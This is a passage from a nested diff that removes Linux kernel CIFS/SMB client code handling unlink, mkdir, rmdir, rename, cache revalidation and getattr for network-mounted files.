+-	cifs_dbg(FYI, "cifs_unlink, dir=0x%p, dentry=0x%p\n", dir, dentry);
+-
+-	if (unlikely(cifs_forced_shutdown(cifs_sb)))
+-		return -EIO;
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-	tcon = tlink_tcon(tlink);
+-	server = tcon->ses->server;
+-
+-	xid = get_xid();
+-	page = alloc_dentry_path();
+-
+-	if (tcon->nodelete) {
+-		rc = -EACCES;
+-		goto unlink_out;
+-	}
+-
+-	/* Unlink can be called from rename so we can not take the
+-	 * sb->s_vfs_rename_mutex here */
+-	full_path = build_path_from_dentry(dentry, page);
+-	if (IS_ERR(full_path)) {
+-		rc = PTR_ERR(full_path);
+-		goto unlink_out;
+-	}
+-
+-	cifs_close_deferred_file_under_dentry(tcon, full_path);
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	if (cap_unix(tcon->ses) && (CIFS_UNIX_POSIX_PATH_OPS_CAP &
+-				le64_to_cpu(tcon->fsUnixInfo.Capability))) {
+-		rc = CIFSPOSIXDelFile(xid, tcon, full_path,
+-			SMB_POSIX_UNLINK_FILE_TARGET, cifs_sb->local_nls,
+-			cifs_remap(cifs_sb));
+-		cifs_dbg(FYI, "posix del rc %d\n", rc);
+-		if ((rc == 0) || (rc == -ENOENT))
+-			goto psx_del_no_retry;
+-	}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-retry_std_delete:
+-	if (!server->ops->unlink) {
+-		rc = -ENOSYS;
+-		goto psx_del_no_retry;
+-	}
+-
+-	rc = server->ops->unlink(xid, tcon, full_path, cifs_sb);
+-
+-psx_del_no_retry:
+-	if (!rc) {
+-		if (inode)
+-			cifs_drop_nlink(inode);
+-	} else if (rc == -ENOENT) {
+-		d_drop(dentry);
+-	} else if (rc == -EBUSY) {
+-		if (server->ops->rename_pending_delete) {
+-			rc = server->ops->rename_pending_delete(full_path,
+-								dentry, xid);
+-			if (rc == 0)
+-				cifs_drop_nlink(inode);
+-		}
+-	} else if ((rc == -EACCES) && (dosattr == 0) && inode) {
+-		attrs = kzalloc(sizeof(*attrs), GFP_KERNEL);
+-		if (attrs == NULL) {
+-			rc = -ENOMEM;
+-			goto out_reval;
+-		}
+-
+-		/* try to reset dos attributes */
+-		cifs_inode = CIFS_I(inode);
+-		origattr = cifs_inode->cifsAttrs;
+-		if (origattr == 0)
+-			origattr |= ATTR_NORMAL;
+-		dosattr = origattr & ~ATTR_READONLY;
+-		if (dosattr == 0)
+-			dosattr |= ATTR_NORMAL;
+-		dosattr |= ATTR_HIDDEN;
+-
+-		rc = cifs_set_file_info(inode, attrs, xid, full_path, dosattr);
+-		if (rc != 0)
+-			goto out_reval;
+-
+-		goto retry_std_delete;
+-	}
+-
+-	/* undo the setattr if we errored out and it's needed */
+-	if (rc != 0 && dosattr != 0)
+-		cifs_set_file_info(inode, attrs, xid, full_path, origattr);
+-
+-out_reval:
+-	if (inode) {
+-		cifs_inode = CIFS_I(inode);
+-		cifs_inode->time = 0;	/* will force revalidate to get info
+-					   when needed */
+-		inode->i_ctime = current_time(inode);
+-	}
+-	dir->i_ctime = dir->i_mtime = current_time(dir);
+-	cifs_inode = CIFS_I(dir);
+-	CIFS_I(dir)->time = 0;	/* force revalidate of dir as well */
+-unlink_out:
+-	free_dentry_path(page);
+-	kfree(attrs);
+-	free_xid(xid);
+-	cifs_put_tlink(tlink);
+-	return rc;
+-}
+-
+-static int
+-cifs_mkdir_qinfo(struct inode *parent, struct dentry *dentry, umode_t mode,
+-		 const char *full_path, struct cifs_sb_info *cifs_sb,
+-		 struct cifs_tcon *tcon, const unsigned int xid)
+-{
+-	int rc = 0;
+-	struct inode *inode = NULL;
+-
+-	if (tcon->posix_extensions)
+-		rc = smb311_posix_get_inode_info(&inode, full_path, parent->i_sb, xid);
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	else if (tcon->unix_ext)
+-		rc = cifs_get_inode_info_unix(&inode, full_path, parent->i_sb,
+-					      xid);
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-	else
+-		rc = cifs_get_inode_info(&inode, full_path, NULL, parent->i_sb,
+-					 xid, NULL);
+-
+-	if (rc)
+-		return rc;
+-
+-	if (!S_ISDIR(inode->i_mode)) {
+-		/*
+-		 * mkdir succeeded, but another client has managed to remove the
+-		 * sucker and replace it with non-directory.  Return success,
+-		 * but don't leave the child in dcache.
+-		 */
+-		 iput(inode);
+-		 d_drop(dentry);
+-		 return 0;
+-	}
+-	/*
+-	 * setting nlink not necessary except in cases where we failed to get it
+-	 * from the server or was set bogus. Also, since this is a brand new
+-	 * inode, no need to grab the i_lock before setting the i_nlink.
+-	 */
+-	if (inode->i_nlink < 2)
+-		set_nlink(inode, 2);
+-	mode &= ~current_umask();
+-	/* must turn on setgid bit if parent dir has it */
+-	if (parent->i_mode & S_ISGID)
+-		mode |= S_ISGID;
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	if (tcon->unix_ext) {
+-		struct cifs_unix_set_info_args args = {
+-			.mode	= mode,
+-			.ctime	= NO_CHANGE_64,
+-			.atime	= NO_CHANGE_64,
+-			.mtime	= NO_CHANGE_64,
+-			.device	= 0,
+-		};
+-		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SET_UID) {
+-			args.uid = current_fsuid();
+-			if (parent->i_mode & S_ISGID)
+-				args.gid = parent->i_gid;
+-			else
+-				args.gid = current_fsgid();
+-		} else {
+-			args.uid = INVALID_UID; /* no change */
+-			args.gid = INVALID_GID; /* no change */
+-		}
+-		CIFSSMBUnixSetPathInfo(xid, tcon, full_path, &args,
+-				       cifs_sb->local_nls,
+-				       cifs_remap(cifs_sb));
+-	} else {
+-#else
+-	{
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-		struct TCP_Server_Info *server = tcon->ses->server;
+-		if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_ACL) &&
+-		    (mode & S_IWUGO) == 0 && server->ops->mkdir_setinfo)
+-			server->ops->mkdir_setinfo(inode, full_path, cifs_sb,
+-						   tcon, xid);
+-		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DYNPERM)
+-			inode->i_mode = (mode | S_IFDIR);
+-
+-		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SET_UID) {
+-			inode->i_uid = current_fsuid();
+-			if (inode->i_mode & S_ISGID)
+-				inode->i_gid = parent->i_gid;
+-			else
+-				inode->i_gid = current_fsgid();
+-		}
+-	}
+-	d_instantiate(dentry, inode);
+-	return 0;
+-}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-static int
+-cifs_posix_mkdir(struct inode *inode, struct dentry *dentry, umode_t mode,
+-		 const char *full_path, struct cifs_sb_info *cifs_sb,
+-		 struct cifs_tcon *tcon, const unsigned int xid)
+-{
+-	int rc = 0;
+-	u32 oplock = 0;
+-	FILE_UNIX_BASIC_INFO *info = NULL;
+-	struct inode *newinode = NULL;
+-	struct cifs_fattr fattr;
+-
+-	info = kzalloc(sizeof(FILE_UNIX_BASIC_INFO), GFP_KERNEL);
+-	if (info == NULL) {
+-		rc = -ENOMEM;
+-		goto posix_mkdir_out;
+-	}
+-
+-	mode &= ~current_umask();
+-	rc = CIFSPOSIXCreate(xid, tcon, SMB_O_DIRECTORY | SMB_O_CREAT, mode,
+-			     NULL /* netfid */, info, &oplock, full_path,
+-			     cifs_sb->local_nls, cifs_remap(cifs_sb));
+-	if (rc == -EOPNOTSUPP)
+-		goto posix_mkdir_out;
+-	else if (rc) {
+-		cifs_dbg(FYI, "posix mkdir returned 0x%x\n", rc);
+-		d_drop(dentry);
+-		goto posix_mkdir_out;
+-	}
+-
+-	if (info->Type == cpu_to_le32(-1))
+-		/* no return info, go query for it */
+-		goto posix_mkdir_get_info;
+-	/*
+-	 * BB check (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SET_UID ) to see if
+-	 * need to set uid/gid.
+-	 */
+-
+-	cifs_unix_basic_to_fattr(&fattr, info, cifs_sb);
+-	cifs_fill_uniqueid(inode->i_sb, &fattr);
+-	newinode = cifs_iget(inode->i_sb, &fattr);
+-	if (!newinode)
+-		goto posix_mkdir_get_info;
+-
+-	d_instantiate(dentry, newinode);
+-
+-#ifdef CONFIG_CIFS_DEBUG2
+-	cifs_dbg(FYI, "instantiated dentry %p %pd to inode %p\n",
+-		 dentry, dentry, newinode);
+-
+-	if (newinode->i_nlink != 2)
+-		cifs_dbg(FYI, "unexpected number of links %d\n",
+-			 newinode->i_nlink);
+-#endif
+-
+-posix_mkdir_out:
+-	kfree(info);
+-	return rc;
+-posix_mkdir_get_info:
+-	rc = cifs_mkdir_qinfo(inode, dentry, mode, full_path, cifs_sb, tcon,
+-			      xid);
+-	goto posix_mkdir_out;
+-}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-int cifs_mkdir(struct user_namespace *mnt_userns, struct inode *inode,
+-	       struct dentry *direntry, umode_t mode)
+-{
+-	int rc = 0;
+-	unsigned int xid;
+-	struct cifs_sb_info *cifs_sb;
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *tcon;
+-	struct TCP_Server_Info *server;
+-	const char *full_path;
+-	void *page;
+-
+-	cifs_dbg(FYI, "In cifs_mkdir, mode = %04ho inode = 0x%p\n",
+-		 mode, inode);
+-
+-	cifs_sb = CIFS_SB(inode->i_sb);
+-	if (unlikely(cifs_forced_shutdown(cifs_sb)))
+-		return -EIO;
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-	tcon = tlink_tcon(tlink);
+-
+-	xid = get_xid();
+-
+-	page = alloc_dentry_path();
+-	full_path = build_path_from_dentry(direntry, page);
+-	if (IS_ERR(full_path)) {
+-		rc = PTR_ERR(full_path);
+-		goto mkdir_out;
+-	}
+-
+-	server = tcon->ses->server;
+-
+-	if ((server->ops->posix_mkdir) && (tcon->posix_extensions)) {
+-		rc = server->ops->posix_mkdir(xid, inode, mode, tcon, full_path,
+-					      cifs_sb);
+-		d_drop(direntry); /* for time being always refresh inode info */
+-		goto mkdir_out;
+-	}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	if (cap_unix(tcon->ses) && (CIFS_UNIX_POSIX_PATH_OPS_CAP &
+-				le64_to_cpu(tcon->fsUnixInfo.Capability))) {
+-		rc = cifs_posix_mkdir(inode, direntry, mode, full_path, cifs_sb,
+-				      tcon, xid);
+-		if (rc != -EOPNOTSUPP)
+-			goto mkdir_out;
+-	}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-	if (!server->ops->mkdir) {
+-		rc = -ENOSYS;
+-		goto mkdir_out;
+-	}
+-
+-	/* BB add setting the equivalent of mode via CreateX w/ACLs */
+-	rc = server->ops->mkdir(xid, inode, mode, tcon, full_path, cifs_sb);
+-	if (rc) {
+-		cifs_dbg(FYI, "cifs_mkdir returned 0x%x\n", rc);
+-		d_drop(direntry);
+-		goto mkdir_out;
+-	}
+-
+-	/* TODO: skip this for smb2/smb3 */
+-	rc = cifs_mkdir_qinfo(inode, direntry, mode, full_path, cifs_sb, tcon,
+-			      xid);
+-mkdir_out:
+-	/*
+-	 * Force revalidate to get parent dir info when needed since cached
+-	 * attributes are invalid now.
+-	 */
+-	CIFS_I(inode)->time = 0;
+-	free_dentry_path(page);
+-	free_xid(xid);
+-	cifs_put_tlink(tlink);
+-	return rc;
+-}
+-
+-int cifs_rmdir(struct inode *inode, struct dentry *direntry)
+-{
+-	int rc = 0;
+-	unsigned int xid;
+-	struct cifs_sb_info *cifs_sb;
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *tcon;
+-	struct TCP_Server_Info *server;
+-	const char *full_path;
+-	void *page = alloc_dentry_path();
+-	struct cifsInodeInfo *cifsInode;
+-
+-	cifs_dbg(FYI, "cifs_rmdir, inode = 0x%p\n", inode);
+-
+-	xid = get_xid();
+-
+-	full_path = build_path_from_dentry(direntry, page);
+-	if (IS_ERR(full_path)) {
+-		rc = PTR_ERR(full_path);
+-		goto rmdir_exit;
+-	}
+-
+-	cifs_sb = CIFS_SB(inode->i_sb);
+-	if (unlikely(cifs_forced_shutdown(cifs_sb))) {
+-		rc = -EIO;
+-		goto rmdir_exit;
+-	}
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink)) {
+-		rc = PTR_ERR(tlink);
+-		goto rmdir_exit;
+-	}
+-	tcon = tlink_tcon(tlink);
+-	server = tcon->ses->server;
+-
+-	if (!server->ops->rmdir) {
+-		rc = -ENOSYS;
+-		cifs_put_tlink(tlink);
+-		goto rmdir_exit;
+-	}
+-
+-	if (tcon->nodelete) {
+-		rc = -EACCES;
+-		cifs_put_tlink(tlink);
+-		goto rmdir_exit;
+-	}
+-
+-	rc = server->ops->rmdir(xid, tcon, full_path, cifs_sb);
+-	cifs_put_tlink(tlink);
+-
+-	if (!rc) {
+-		spin_lock(&d_inode(direntry)->i_lock);
+-		i_size_write(d_inode(direntry), 0);
+-		clear_nlink(d_inode(direntry));
+-		spin_unlock(&d_inode(direntry)->i_lock);
+-	}
+-
+-	cifsInode = CIFS_I(d_inode(direntry));
+-	/* force revalidate to go get info when needed */
+-	cifsInode->time = 0;
+-
+-	cifsInode = CIFS_I(inode);
+-	/*
+-	 * Force revalidate to get parent dir info when needed since cached
+-	 * attributes are invalid now.
+-	 */
+-	cifsInode->time = 0;
+-
+-	d_inode(direntry)->i_ctime = inode->i_ctime = inode->i_mtime =
+-		current_time(inode);
+-
+-rmdir_exit:
+-	free_dentry_path(page);
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-static int
+-cifs_do_rename(const unsigned int xid, struct dentry *from_dentry,
+-	       const char *from_path, struct dentry *to_dentry,
+-	       const char *to_path)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(from_dentry->d_sb);
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *tcon;
+-	struct TCP_Server_Info *server;
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	struct cifs_fid fid;
+-	struct cifs_open_parms oparms;
+-	int oplock;
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-	int rc;
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-	tcon = tlink_tcon(tlink);
+-	server = tcon->ses->server;
+-
+-	if (!server->ops->rename)
+-		return -ENOSYS;
+-
+-	/* try path-based rename first */
+-	rc = server->ops->rename(xid, tcon, from_path, to_path, cifs_sb);
+-
+-	/*
+-	 * Don't bother with rename by filehandle unless file is busy and
+-	 * source. Note that cross directory moves do not work with
+-	 * rename by filehandle to various Windows servers.
+-	 */
+-	if (rc == 0 || rc != -EBUSY)
+-		goto do_rename_exit;
+-
+-	/* Don't fall back to using SMB on SMB 2+ mount */
+-	if (server->vals->protocol_id != 0)
+-		goto do_rename_exit;
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	/* open-file renames don't work across directories */
+-	if (to_dentry->d_parent != from_dentry->d_parent)
+-		goto do_rename_exit;
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.cifs_sb = cifs_sb,
+-		/* open the file to be renamed -- we need DELETE perms */
+-		.desired_access = DELETE,
+-		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
+-		.disposition = FILE_OPEN,
+-		.path = from_path,
+-		.fid = &fid,
+-	};
+-
+-	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+-	if (rc == 0) {
+-		rc = CIFSSMBRenameOpenFile(xid, tcon, fid.netfid,
+-				(const char *) to_dentry->d_name.name,
+-				cifs_sb->local_nls, cifs_remap(cifs_sb));
+-		CIFSSMBClose(xid, tcon, fid.netfid);
+-	}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-do_rename_exit:
+-	if (rc == 0)
+-		d_move(from_dentry, to_dentry);
+-	cifs_put_tlink(tlink);
+-	return rc;
+-}
+-
+-int
+-cifs_rename2(struct user_namespace *mnt_userns, struct inode *source_dir,
+-	     struct dentry *source_dentry, struct inode *target_dir,
+-	     struct dentry *target_dentry, unsigned int flags)
+-{
+-	const char *from_name, *to_name;
+-	void *page1, *page2;
+-	struct cifs_sb_info *cifs_sb;
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *tcon;
+-	unsigned int xid;
+-	int rc, tmprc;
+-	int retry_count = 0;
+-	FILE_UNIX_BASIC_INFO *info_buf_source = NULL;
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	FILE_UNIX_BASIC_INFO *info_buf_target;
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-	if (flags & ~RENAME_NOREPLACE)
+-		return -EINVAL;
+-
+-	cifs_sb = CIFS_SB(source_dir->i_sb);
+-	if (unlikely(cifs_forced_shutdown(cifs_sb)))
+-		return -EIO;
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-	tcon = tlink_tcon(tlink);
+-
+-	page1 = alloc_dentry_path();
+-	page2 = alloc_dentry_path();
+-	xid = get_xid();
+-
+-	from_name = build_path_from_dentry(source_dentry, page1);
+-	if (IS_ERR(from_name)) {
+-		rc = PTR_ERR(from_name);
+-		goto cifs_rename_exit;
+-	}
+-
+-	to_name = build_path_from_dentry(target_dentry, page2);
+-	if (IS_ERR(to_name)) {
+-		rc = PTR_ERR(to_name);
+-		goto cifs_rename_exit;
+-	}
+-
+-	cifs_close_deferred_file_under_dentry(tcon, from_name);
+-	if (d_inode(target_dentry) != NULL)
+-		cifs_close_deferred_file_under_dentry(tcon, to_name);
+-
+-	rc = cifs_do_rename(xid, source_dentry, from_name, target_dentry,
+-			    to_name);
+-
+-	if (rc == -EACCES) {
+-		while (retry_count < 3) {
+-			cifs_close_all_deferred_files(tcon);
+-			rc = cifs_do_rename(xid, source_dentry, from_name, target_dentry,
+-					    to_name);
+-			if (rc != -EACCES)
+-				break;
+-			retry_count++;
+-		}
+-	}
+-
+-	/*
+-	 * No-replace is the natural behavior for CIFS, so skip unlink hacks.
+-	 */
+-	if (flags & RENAME_NOREPLACE)
+-		goto cifs_rename_exit;
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	if (rc == -EEXIST && tcon->unix_ext) {
+-		/*
+-		 * Are src and dst hardlinks of same inode? We can only tell
+-		 * with unix extensions enabled.
+-		 */
+-		info_buf_source =
+-			kmalloc_array(2, sizeof(FILE_UNIX_BASIC_INFO),
+-					GFP_KERNEL);
+-		if (info_buf_source == NULL) {
+-			rc = -ENOMEM;
+-			goto cifs_rename_exit;
+-		}
+-
+-		info_buf_target = info_buf_source + 1;
+-		tmprc = CIFSSMBUnixQPathInfo(xid, tcon, from_name,
+-					     info_buf_source,
+-					     cifs_sb->local_nls,
+-					     cifs_remap(cifs_sb));
+-		if (tmprc != 0)
+-			goto unlink_target;
+-
+-		tmprc = CIFSSMBUnixQPathInfo(xid, tcon, to_name,
+-					     info_buf_target,
+-					     cifs_sb->local_nls,
+-					     cifs_remap(cifs_sb));
+-
+-		if (tmprc == 0 && (info_buf_source->UniqueId ==
+-				   info_buf_target->UniqueId)) {
+-			/* same file, POSIX says that this is a noop */
+-			rc = 0;
+-			goto cifs_rename_exit;
+-		}
+-	}
+-	/*
+-	 * else ... BB we could add the same check for Windows by
+-	 * checking the UniqueId via FILE_INTERNAL_INFO
+-	 */
+-
+-unlink_target:
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-	/* Try unlinking the target dentry if it's not negative */
+-	if (d_really_is_positive(target_dentry) && (rc == -EACCES || rc == -EEXIST)) {
+-		if (d_is_dir(target_dentry))
+-			tmprc = cifs_rmdir(target_dir, target_dentry);
+-		else
+-			tmprc = cifs_unlink(target_dir, target_dentry);
+-		if (tmprc)
+-			goto cifs_rename_exit;
+-		rc = cifs_do_rename(xid, source_dentry, from_name,
+-				    target_dentry, to_name);
+-	}
+-
+-	/* force revalidate to go get info when needed */
+-	CIFS_I(source_dir)->time = CIFS_I(target_dir)->time = 0;
+-
+-	source_dir->i_ctime = source_dir->i_mtime = target_dir->i_ctime =
+-		target_dir->i_mtime = current_time(source_dir);
+-
+-cifs_rename_exit:
+-	kfree(info_buf_source);
+-	free_dentry_path(page2);
+-	free_dentry_path(page1);
+-	free_xid(xid);
+-	cifs_put_tlink(tlink);
+-	return rc;
+-}
+-
+-static bool
+-cifs_dentry_needs_reval(struct dentry *dentry)
+-{
+-	struct inode *inode = d_inode(dentry);
+-	struct cifsInodeInfo *cifs_i = CIFS_I(inode);
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
+-	struct cached_fid *cfid = NULL;
+-
+-	if (cifs_i->time == 0)
+-		return true;
+-
+-	if (CIFS_CACHE_READ(cifs_i))
+-		return false;
+-
+-	if (!lookupCacheEnabled)
+-		return true;
+-
+-	if (!open_cached_dir_by_dentry(tcon, dentry->d_parent, &cfid)) {
+-		spin_lock(&cfid->fid_lock);
+-		if (cfid->time && cifs_i->time > cfid->time) {
+-			spin_unlock(&cfid->fid_lock);
+-			close_cached_dir(cfid);
+-			return false;
+-		}
+-		spin_unlock(&cfid->fid_lock);
+-		close_cached_dir(cfid);
+-	}
+-	/*
+-	 * depending on inode type, check if attribute caching disabled for
+-	 * files or directories
+-	 */
+-	if (S_ISDIR(inode->i_mode)) {
+-		if (!cifs_sb->ctx->acdirmax)
+-			return true;
+-		if (!time_in_range(jiffies, cifs_i->time,
+-				   cifs_i->time + cifs_sb->ctx->acdirmax))
+-			return true;
+-	} else { /* file */
+-		if (!cifs_sb->ctx->acregmax)
+-			return true;
+-		if (!time_in_range(jiffies, cifs_i->time,
+-				   cifs_i->time + cifs_sb->ctx->acregmax))
+-			return true;
+-	}
+-
+-	/* hardlinked files w/ noserverino get "special" treatment */
+-	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM) &&
+-	    S_ISREG(inode->i_mode) && inode->i_nlink != 1)
+-		return true;
+-
+-	return false;
+-}
+-
+-/*
+- * Zap the cache. Called when invalid_mapping flag is set.
+- */
+-int
+-cifs_invalidate_mapping(struct inode *inode)
+-{
+-	int rc = 0;
+-
+-	if (inode->i_mapping && inode->i_mapping->nrpages != 0) {
+-		rc = invalidate_inode_pages2(inode->i_mapping);
+-		if (rc)
+-			cifs_dbg(VFS, "%s: Could not invalidate inode %p\n",
+-				 __func__, inode);
+-	}
+-
+-	return rc;
+-}
+-
+-/**
+- * cifs_wait_bit_killable - helper for functions that are sleeping on bit locks
+- *
+- * @key:	currently unused
+- * @mode:	the task state to sleep in
+- */
+-static int
+-cifs_wait_bit_killable(struct wait_bit_key *key, int mode)
+-{
+-	schedule();
+-	if (signal_pending_state(mode, current))
+-		return -ERESTARTSYS;
+-	return 0;
+-}
+-
+-int
+-cifs_revalidate_mapping(struct inode *inode)
+-{
+-	int rc;
+-	unsigned long *flags = &CIFS_I(inode)->flags;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-
+-	/* swapfiles are not supposed to be shared */
+-	if (IS_SWAPFILE(inode))
+-		return 0;
+-
+-	rc = wait_on_bit_lock_action(flags, CIFS_INO_LOCK, cifs_wait_bit_killable,
+-				     TASK_KILLABLE|TASK_FREEZABLE_UNSAFE);
+-	if (rc)
+-		return rc;
+-
+-	if (test_and_clear_bit(CIFS_INO_INVALID_MAPPING, flags)) {
+-		/* for cache=singleclient, do not invalidate */
+-		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RW_CACHE)
+-			goto skip_invalidate;
+-
+-		rc = cifs_invalidate_mapping(inode);
+-		if (rc)
+-			set_bit(CIFS_INO_INVALID_MAPPING, flags);
+-	}
+-
+-skip_invalidate:
+-	clear_bit_unlock(CIFS_INO_LOCK, flags);
+-	smp_mb__after_atomic();
+-	wake_up_bit(flags, CIFS_INO_LOCK);
+-
+-	return rc;
+-}
+-
+-int
+-cifs_zap_mapping(struct inode *inode)
+-{
+-	set_bit(CIFS_INO_INVALID_MAPPING, &CIFS_I(inode)->flags);
+-	return cifs_revalidate_mapping(inode);
+-}
+-
+-int cifs_revalidate_file_attr(struct file *filp)
+-{
+-	int rc = 0;
+-	struct dentry *dentry = file_dentry(filp);
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	struct cifsFileInfo *cfile = (struct cifsFileInfo *) filp->private_data;
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-	if (!cifs_dentry_needs_reval(dentry))
+-		return rc;
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	if (tlink_tcon(cfile->tlink)->unix_ext)
+-		rc = cifs_get_file_info_unix(filp);
+-	else
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-		rc = cifs_get_file_info(filp);
+-
+-	return rc;
+-}
+-
+-int cifs_revalidate_dentry_attr(struct dentry *dentry)
+-{
+-	unsigned int xid;
+-	int rc = 0;
+-	struct inode *inode = d_inode(dentry);
+-	struct super_block *sb = dentry->d_sb;
+-	const char *full_path;
+-	void *page;
+-	int count = 0;
+-
+-	if (inode == NULL)
+-		return -ENOENT;
+-
+-	if (!cifs_dentry_needs_reval(dentry))
+-		return rc;
+-
+-	xid = get_xid();
+-
+-	page = alloc_dentry_path();
+-	full_path = build_path_from_dentry(dentry, page);
+-	if (IS_ERR(full_path)) {
+-		rc = PTR_ERR(full_path);
+-		goto out;
+-	}
+-
+-	cifs_dbg(FYI, "Update attributes: %s inode 0x%p count %d dentry: 0x%p d_time %ld jiffies %ld\n",
+-		 full_path, inode, inode->i_count.counter,
+-		 dentry, cifs_get_time(dentry), jiffies);
+-
+-again:
+-	if (cifs_sb_master_tcon(CIFS_SB(sb))->posix_extensions)
+-		rc = smb311_posix_get_inode_info(&inode, full_path, sb, xid);
+-	else if (cifs_sb_master_tcon(CIFS_SB(sb))->unix_ext)
+-		rc = cifs_get_inode_info_unix(&inode, full_path, sb, xid);
+-	else
+-		rc = cifs_get_inode_info(&inode, full_path, NULL, sb,
+-					 xid, NULL);
+-	if (rc == -EAGAIN && count++ < 10)
+-		goto again;
+-out:
+-	free_dentry_path(page);
+-	free_xid(xid);
+-
+-	return rc;
+-}
+-
+-int cifs_revalidate_file(struct file *filp)
+-{
+-	int rc;
+-	struct inode *inode = file_inode(filp);
+-
+-	rc = cifs_revalidate_file_attr(filp);
+-	if (rc)
+-		return rc;
+-
+-	return cifs_revalidate_mapping(inode);
+-}
+-
+-/* revalidate a dentry's inode attributes */
+-int cifs_revalidate_dentry(struct dentry *dentry)
+-{
+-	int rc;
+-	struct inode *inode = d_inode(dentry);
+-
+-	rc = cifs_revalidate_dentry_attr(dentry);
+-	if (rc)
+-		return rc;
+-
+-	return cifs_revalidate_mapping(inode);
+-}
+-
+-int cifs_getattr(struct user_namespace *mnt_userns, const struct path *path,
+-		 struct kstat *stat, u32 request_mask, unsigned int flags)
+-{
+-	struct dentry *dentry = path->dentry;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(dentry->d_sb);
+-	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
+-	struct inode *inode = d_inode(dentry);
+-	int rc;
+-
+-	if (unlikely(cifs_forced_shutdown(CIFS_SB(inode->i_sb))))
+-		return -EIO;
+-
+-	/*
+-	 * We need to be sure that all dirty pages are written and the server
+-	 * has actual ctime, mtime and file length.
+-	 */
+-	if ((request_mask & (STATX_CTIME | STATX_MTIME | STATX_SIZE | STATX_BLOCKS)) &&
+-	    !CIFS_CACHE_READ(CIFS_I(inode)) &&
+-	    inode->i_mapping && inode->i_mapping->nrpages != 0) {
+-		rc = filemap_fdatawait(inode->i_mapping);
+-		if (rc) {
+-			mapping_set_error(inode->i_mapping, rc);
+-			return rc;
+-		}
+-	}
+-
+-	if ((flags & AT_STATX_SYNC_TYPE) == AT_STATX_FORCE_SYNC)
+-		CIFS_I(inode)->time = 0; /* force revalidate */
+-
+-	/*
+-	 * If the caller doesn't require syncing, only sync if
+-	 * necessary (e.g. due to earlier truncate or setattr
+-	 * invalidating the cached metadata)
+-	 */
+-	if (((flags & AT_STATX_SYNC_TYPE) != AT_STATX_DONT_SYNC) ||
+-	    (CIFS_I(inode)->time == 0)) {
+-		rc = cifs_revalidate_dentry_attr(dentry);
+-		if (rc)
+-			return rc;
+-	}
+-
+-	generic_fillattr(&init_user_ns, inode, stat);
+-	stat->blksize = cifs_sb->ctx->bsize;
+-	stat->ino = CIFS_I(inode)->uniqueid;
+-
+-	/* old CIFS Unix Extensions doesn't return create time */
+-	if (CIFS_I(inode)->createtime) {
+-		stat->result_mask |= STATX_BTIME;
+-		stat->btime =
+-		      cifs_NTtimeToUnix(cpu_to_le64(CIFS_I(inode)->createtime));
+-	}
+-
+-	stat->attributes_mask |= (STATX_ATTR_COMPRESSED | STATX_ATTR_ENCRYPTED);
+-	if (CIFS_I(inode)->cifsAttrs & FILE_ATTRIBUTE_COMPRESSED)
+-		stat->attributes |= STATX_ATTR_COMPRESSED;
+-	if (CIFS_I(inode)->cifsAttrs & FILE_ATTRIBUTE_ENCRYPTED)
+-		stat->attributes |= STATX_ATTR_ENCRYPTED;
+-
+-	/*
